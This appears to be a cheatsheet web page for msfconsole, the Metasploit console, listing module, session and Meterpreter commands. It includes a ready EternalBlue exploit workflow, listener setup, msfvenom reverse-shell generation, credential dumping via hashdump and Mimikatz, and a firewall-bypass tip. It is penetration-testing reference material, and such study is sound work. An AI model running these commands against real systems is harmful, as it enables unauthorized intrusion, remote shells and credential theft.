<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'; style-src 'self'; font-src 'self' data:; img-src 'self' data:; connect-src 'self'; base-uri 'self'; form-action 'self' https://defcon.social https://bsky.app;">
<meta http-equiv="X-Content-Type-Options" content="nosniff">
<link rel="stylesheet" href="../assets/css/style.css">
<link rel="icon" type="image/x-icon" href="../favicon.ico">
<script>
// Apply theme immediately to prevent flash
(function() {
const theme = localStorage.getItem('theme') ||
(window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light');
document.documentElement.setAttribute('data-theme', theme);
})();
</script>
<title>msfconsole Cheatsheet - Cheatsheets - Launch Pad</title>
</head>
<body>
<button class="theme-toggle" id="themeToggle" aria-label="Toggle dark mode">
<svg class="theme-icon theme-icon-moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path></svg>
<svg class="theme-icon theme-icon-sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" style="display: none;"><circle cx="12" cy="12" r="5"></circle><line x1="12" y1="1" x2="12" y2="3"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line><line x1="1" y1="12" x2="3" y2="12"></line><line x1="21" y1="12" x2="23" y2="12"></line><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line></svg>
</button>
<br/><br/>
<div class="name">
__ _______________________ _________._________________________
\_ _____/ \______ \ / _ \ / _____/ / _____/ | | \_ _____/
| __) | _/ / /_\ \ / \ ___ / \ ___ | | | __)_
| \ | | \ / | \ \ \_\ \ \ \_\ \ | |___ | \
\___ / |____|_ / \____|__ / \______ / \______ / |_______ \ /_______ /
\/ \/ \/ \/ \/ \/ \/
</div>
<div class="blog-page-header">
<div class="blog-header-content">
<a href="/cheatsheets" class="back-link" title="Back to Cheatsheets">
<svg xmlns="http://www.w3.org/2000/svg" width="42" height="42" viewBox="0 0 24 24" class="home-icon"><path fill="currentColor" d="M10 20v-6h4v6h5v-8h3L12 3 2 12h3v8z"/></svg>
</a>
<h1 class="blog-page-title">msfconsole Cheatsheet</h1>
</div>
</div>
<div class="blog-post-container">
<div class="blog-posts-container" style="max-width: 900px; margin: 0 auto;">
<div class="blog-post">
<div class="blog-post-content">
<p><a href="index.html">← Back to cheatsheets</a></p>
<p><a href="../index.html">← Home</a></p>
<hr>
<p>msfconsole is the primary interface to the Metasploit Framework - the world's most used penetration testing tool. It provides exploit development, payload generation, post-exploitation, and much more.</p>
<hr>
<h2>Starting Metasploit</h2>
<ul>
<li>msfconsole - Start console</li>
<li>msfconsole -q - Quiet mode (no banner)</li>
<li>msfconsole -r script.rc - Run resource script</li>
<li>msfconsole -x "commands" - Execute commands</li>
</ul>
<hr>
<h2>Core Commands</h2>
<ul>
<li>help - Show help</li>
<li>search &lt;term&gt; - Search modules</li>
<li>use &lt;module&gt; - Select module</li>
<li>info - Module information</li>
<li>show options - Show required options</li>
<li>show advanced - Show advanced options</li>
<li>set &lt;option&gt; &lt;value&gt; - Set option</li>
<li>setg &lt;option&gt; &lt;value&gt; - Set global option</li>
<li>unset &lt;option&gt; - Clear option</li>
<li>run / exploit - Execute module</li>
<li>back - Exit current module</li>
<li>exit - Quit msfconsole</li>
</ul>
<hr>
<h2>Search Syntax</h2>
<ul>
<li>search &lt;term&gt; - Basic search</li>
<li>search type:exploit &lt;term&gt; - By type</li>
<li>search platform:windows - By platform</li>
<li>search name:smb - By name</li>
<li>search cve:2021 - By CVE year</li>
<li>search author:hdm - By author</li>
<li>search rank:excellent - By rank</li>
</ul>
<h3>Module Types</h3>
<ul>
<li>exploit - Exploitation modules</li>
<li>auxiliary - Scanning, fuzzing, etc.</li>
<li>post - Post-exploitation</li>
<li>payload - Payloads (shellcode)</li>
<li>encoder - Payload encoders</li>
<li>nop - NOP generators</li>
<li>evasion - Evasion modules</li>
</ul>
<hr>
<h2>Module Commands</h2>
<ul>
<li>show exploits - List exploits</li>
<li>show auxiliary - List auxiliary</li>
<li>show payloads - List payloads (context-aware)</li>
<li>show encoders - List encoders</li>
<li>show targets - Show exploit targets</li>
<li>show options - Current module options</li>
<li>check - Check if target is vulnerable</li>
</ul>
<hr>
<h2>Payload Options</h2>
<ul>
<li>set PAYLOAD &lt;payload&gt; - Set payload</li>
<li>set LHOST &lt;ip&gt; - Local host (listener)</li>
<li>set LPORT &lt;port&gt; - Local port (listener)</li>
<li>set RHOST &lt;ip&gt; - Remote host (target)</li>
<li>set RHOSTS &lt;ip/range&gt; - Remote hosts</li>
<li>set RPORT &lt;port&gt; - Remote port</li>
</ul>
<hr>
<h2>Common Payloads</h2>
<h3>Windows</h3>
<ul>
<li>windows/meterpreter/reverse_tcp</li>
<li>windows/meterpreter/reverse_https</li>
<li>windows/shell/reverse_tcp</li>
<li>windows/x64/meterpreter/reverse_tcp</li>
</ul>
<h3>Linux</h3>
<ul>
<li>linux/x86/meterpreter/reverse_tcp</li>
<li>linux/x64/meterpreter/reverse_tcp</li>
<li>linux/x86/shell/reverse_tcp</li>
</ul>
<h3>Multi-platform</h3>
<ul>
<li>multi/handler - Catch incoming connections</li>
<li>generic/shell_reverse_tcp</li>
</ul>
<hr>
<h2>Session Management</h2>
<ul>
<li>sessions - List active sessions</li>
<li>sessions -i &lt;id&gt; - Interact with session</li>
<li>sessions -k &lt;id&gt; - Kill session</li>
<li>sessions -K - Kill all sessions</li>
<li>sessions -u &lt;id&gt; - Upgrade to meterpreter</li>
<li>background / bg - Background session</li>
</ul>
<hr>
<h2>Meterpreter Commands</h2>
<h3>Core</h3>
<ul>
<li>help - Show commands</li>
<li>background - Background session</li>
<li>exit - Terminate session</li>
<li>sysinfo - System information</li>
<li>getuid - Current user</li>
<li>getpid - Process ID</li>
</ul>
<h3>File System</h3>
<ul>
<li>pwd - Print working directory</li>
<li>cd - Change directory</li>
<li>ls - List files</li>
<li>cat - Display file</li>
<li>download file - Download file</li>
<li>upload file - Upload file</li>
<li>rm file - Remove file</li>
<li>mkdir dir - Create directory</li>
<li>search -f pattern - Search files</li>
</ul>
<h3>Process</h3>
<ul>
<li>ps - List processes</li>
<li>migrate &lt;pid&gt; - Migrate to process</li>
<li>kill &lt;pid&gt; - Kill process</li>
<li>execute -f cmd - Execute command</li>
</ul>
<h3>Network</h3>
<ul>
<li>ipconfig / ifconfig - Network info</li>
<li>netstat - Network connections</li>
<li>portfwd - Port forwarding</li>
<li>route - Routing table</li>
</ul>
<h3>Privilege Escalation</h3>
<ul>
<li>getsystem - Attempt SYSTEM</li>
<li>hashdump - Dump password hashes</li>
<li>load kiwi - Load Mimikatz</li>
<li>creds_all - All credentials (kiwi)</li>
</ul>
<hr>
<h2>Database Commands</h2>
<ul>
<li>db_status - Database status</li>
<li>workspace - Manage workspaces</li>
<li>hosts - List hosts in DB</li>
<li>services - List services</li>
<li>vulns - List vulnerabilities</li>
<li>creds - List credentials</li>
<li>loot - List loot</li>
<li>db_nmap - Run nmap, save to DB</li>
<li>db_import file - Import scan results</li>
</ul>
<hr>
<h2>Common Workflows</h2>
<h3>Exploit Workflow</h3>
<pre><code>search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit</code></pre>
<h3>Handler Setup</h3>
<pre><code>use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j</code></pre>
<h3>Port Scan</h3>
<pre><code>use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445
run</code></pre>
<h3>SMB Enumeration</h3>
<pre><code>use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run</code></pre>
<hr>
<h2>Payload Generation (msfvenom)</h2>
<pre><code># Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf > shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw > shell.php

# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw

# List formats
msfvenom --list formats</code></pre>
<hr>
<h2>Resource Scripts</h2>
<p>Create .rc files to automate tasks:</p>
<pre><code># handler.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
exploit -j</code></pre>
<p>Run with: msfconsole -r handler.rc</p>
<hr>
<h2>Tips</h2>
<ul>
<li>Always run db_status to ensure the database is connected</li>
<li>Use workspaces to organize different engagements</li>
<li>Use -j with exploit to run as a job (background)</li>
<li>Check if target is vulnerable before exploiting</li>
<li>Use staged payloads for smaller initial size</li>
<li>Use HTTPS payloads to bypass firewalls</li>
<li>Update regularly: msfupdate</li>
<li>Only use with proper authorization</li>
</ul>
<hr>
<p><a href="index.html">← Back to cheatsheets</a></p>
<p><a href="../index.html">← Home</a></p>
</div>
</div>
</div>
</div>
<script async type="text/javascript" src="../blog/analytics.js"></script>
<script src="../theme.js"></script>
</body>
</html>